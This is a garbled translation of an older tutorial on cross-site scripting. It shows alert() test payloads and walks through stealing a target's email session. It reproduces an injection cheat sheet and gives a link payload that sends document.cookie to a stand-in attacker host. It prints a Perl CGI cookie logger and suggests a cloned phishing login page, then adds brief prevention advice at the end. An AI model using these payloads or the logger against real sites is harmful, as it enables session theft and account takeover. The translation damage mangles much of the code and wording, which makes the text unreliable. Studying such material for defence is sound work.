Cross-Site Scripting

I have read an article written by analysts to introduce the security risks of cross-site scripting.

I have not read this question carefully. At present, this kind of question is often published on some security sites. I just saw this article.

,

With the idea of better understanding than not, I translated and sorted it out. The original text is in the collection directory on the home page, which is incorrect.

Please

Give more advice.

OK, go ............

What is XSS )?

Cross-site Scripting refers to the malicious data inserted in the html code of the remote web page.

The page is trustworthy, but when the browser downloads the page, the script embedded in it will be interpreted and executed,

Sometimes cross-site scripting is called "XSS" because "CSS" is generally called a hierarchical style table, which is confusing,

If

When someone mentions a CSS or XSS security vulnerability, it usually refers to cross-site scripting.

What is the difference between XSS and script injection?

In the original article, the author discussed it with a friend (b0iler) and realized that it was not any attack that could be achieved by using script insertion.

Vulnerabilities are called XSS, and there is another attack method: "Script Injection". Their differences are as follows:

1. (Script Injection) the Script insertion attack will save the Script we inserted in the modified remote WEB page, as shown in figure

: SQL injection, XPath injection.

2. Cross-Site Scripting is temporary and disappears after execution.

What types of scripts can be inserted into remote pages?

Mainstream scripts include the following:

HTML

JavaScript (discussed in this article)

VBScript

ActiveX

Flash

What causes a website to have an XSS security vulnerability?

When many cgi/php scripts are executed, if it finds that the request page submitted by the customer does not exist or has other types of errors,

The error message is printed to an html file and sent to the visitor.

Example: 404-yourfile.html Not Found!

We usually don't pay attention to this information, but now we have to take a closer look at the causes of CSS vulnerabilities.

Example: www. somesite. tld/cgi-bin/program. cgi? Pageappsdownloads.html

The URL is valid, but if we replace downloads.html with brainrawt_owns _

Me.html

, One containing 404-brainrawt_owns_me.html Not Found! The information page will be fed back to the visitor's browsing

.

Consider how it writes our input to an html file?

OK. Now is the time to check the XSS vulnerability!

Note: The following is just an example. The page has an XSS vulnerability. We can insert a javascript code to the page.

. Of course there are many methods

Www. somesite. tld/cgi-bin/program. cgi? Page = <script> alert ('xss _ Vuln_Testing ') </SC

Ript>

When we submit this URL, a message box is displayed in our browser, "XSS_Vuln_Testing "?

This example is a simple demonstration of the XSS vulnerability, but it does not have practical significance, but it is sufficient to explain the problem.

Next we will analyze the cause of this running result. program. cgi does not filter our input effectively.

,

Directly write the 404 error page, and a page is created as follows:

<Html>

<B> 404 </B>-<script> alert ('xss _ Vuln_Testing ') </script> Not Found!

</Html>

The javascript script is interpreted and executed in the browser, and the result is displayed.

How to Use XSS to complete hacking?

As mentioned above, if user-submitted requests cannot be met, the server-side script will write the input information

One

Html file. When the server program does not effectively filter the data written into the html file, malicious scripts can be inserted.

To

In the html file. When other users browse the connection, the script will be interpreted and executed through the client browser.

Example:

Suppose you find that myemailserver. tld has a CSS vulnerability and you want to obtain one of them's email accounts, such as our

The target is b00b.

Www. myemailserver. tld/cgi-bin/news. cgi? Article = 59035

Modify the connection with the above CSS vulnerability:

Www. myemailserver. tld/cgi-bin/news. cgi? Article = hax0red

This creates an error page and we get the following information:

Invalid Input! [Article = hax0red]

When you insert the following javascript code, a message box containing test will pop up on your screen.

Www. myemailserver. tld/cgi-bin/news. cgi? Article = <script> alert ('test') <

/Script>

<Script> it is not printed to the screen, and is executed in the background because the server-side program does not

<Script> alert ('test') </script> for effective filtering, so the script is sent back to the browser and executed on the page.

.

Let's take a look at how to use this vulnerability to intrude the email address of Comrade b00b. First, you must know the email address of b00b,

And know the role of cookies. Then you can tell b00b a malicious connection.

The intention is to obtain the desired information from the cookie information on the b00b machine.

Try to make b00b access the article published by the myemailserver. tld site, for example, "Dear b00b, Look at this beauty

Female

How ?"

So when poor b00b accesses www. myemailserver. tld/cgi-bin/news. cgi? Article = <script> steal

And save the cookie script.

</Script>

What happens during connection? Cookie is available. You should know what to do!

If this is not the case, you can copy the login page of the email server and mount it to another system,

Then guide the user to log on to your malicious system page

In this way, you can record user information and then send the recorded information back to the real email server page,

The dummies don't realize what actually happens.

Insert a javascript script into a web page using the following methods:

<Snip>

Copied from: gobbles security advisory #33

Here is a cut-n-paste collection of typical JavaScript-injection hacks

You may derive some glee from playing.

<A href = "javascript # [code]">

<Div onmouseover = "[code]">



[IE]

<Input type = "image" dynsrc = "javascript: [code]"> [IE]

<Bgsound src = "javascript: [code]"> [IE]

& <Script> [code] </script>

& {[Code]}; [N4]

[N4]

<Link rel = "stylesheet" href = "javascript: [code]">

<Iframe src = "vbscript: [code]"> [IE]

[N4]

[N4]

<A href = "about: <script> [code] </script>">

<Meta http-equiv = "refresh" content = "0; url = javascript: [code]">

<Body onload = "[code]">

<Div style = "background-image: url (javascript: [code]);">

<Div style = "behaviour: url ([link to code]);"> [IE]

<Div style = "binding: url ([link to code]);"> [Mozilla]

<Div style = "width: expression ([code]);"> [IE]

<Style type = "text/javascript"> [code] </style> [N4]

<Object classid = "clsid:..." codebase = "javascript: [code]"> [IE]

<Style> <! -- </Style> <script> [code] // --> </script>

<! [CDATA [<! --]> <Script> [code] // --> </script>

<! --> <Script> [code] </script> <! -->

<Script> [code] </script>





<Xml src = "javascript: [code]">

<Xml id = "X"> <a> <B> <script> [code] </script>; </B> </a> </xml>

<Div dataworkflow = "B" dataformatas = "html" datasrc = "# X"> </div>

[/XC0] [/xBC] script> [code] [/xC0] [/xBC]/script> [UTF-8; IE, Opera]

---- Copied from gobbles security advisory #33 ----

</Snip>

An example of getting a cookie and recording it:

Note: To make it work, your browser must be allowed to accept cookies sent by http://website.tld sites,

When I test the following information, use

Javascriptcreate cookiesof the Creator, and the javascriptscript is stored in the index.html file.

OK, the following assumes that the http://website.tld has the security risk of XSS attacks, the connection of the vulnerability is:

Http://website.tld/program.cgi? Input = <edevil javascript>

We create a connection:

Http://website.tld/program.cgi? Input = <script> document. location = 'HTTP: // yoursite

. Tld

/Cgi-bin/evil_cookie_logger.cgi? '+ Document. cookie </script>

Then let the user who saves the site cookie Access the connection:

This is our CGI script. Its function is to record user cookies:

--------- Evil_cookie_logger.cgi -----------

#! /Usr/bin/perl

# Evil_cookie_logger.cgi

# Remote cookie logging CGI coded by BrainRawt

#

# NOTE: coded as a proof of concept script when testing

# Cross-site scripting vulnerabilities.

$ Borrowed_info = $ ENV {'query _ string '};

$ Borrowed_info = ~ S/% ([a-fA-F0-9] [a-fA-F0-9])/pack ("C", hex ($1)/eg;

Open (EVIL_COOKIE_LOG, "> evil_cookie_log") or print "Content-type:

Text/html/n something went wrong/n ";

Print EVIL_COOKIE_LOG "$ borrowed_info/n ";

Print "Content-type: text/html/n ";

Close (EVIL_COOKIE_LOG );

------------------------------------------

The script first obtains the cookie through $ ENV {'query _ string'} and prints it to the $ borrowed_info variable,

Store cookie information to evil_cookie_lo through open (EVIL_COOKIE_LOG, "> evil_cookie_log ")

G file.

Note: The above javascript script may not be executed on Some browsers or sites,

This is just for testing on my own site.

How to Prevent XSS attacks?

1. Disable javascript scripts on your WEB browser

2. The developer should carefully review the code and perform a valid check on the submitted input data, such as "<" and "> ".

You can convert "<", ">" to <,>

Note: Due to the diversity of cross-site scripting (XSS) vulnerabilities, programmers must understand the specific characters to be filtered,

This mainly depends on the role of the developed program. We recommend that you filter out all metacharacters, including "= ".

For victims, do not access connections that contain <script> characters. Some official URLs do not include any script elements.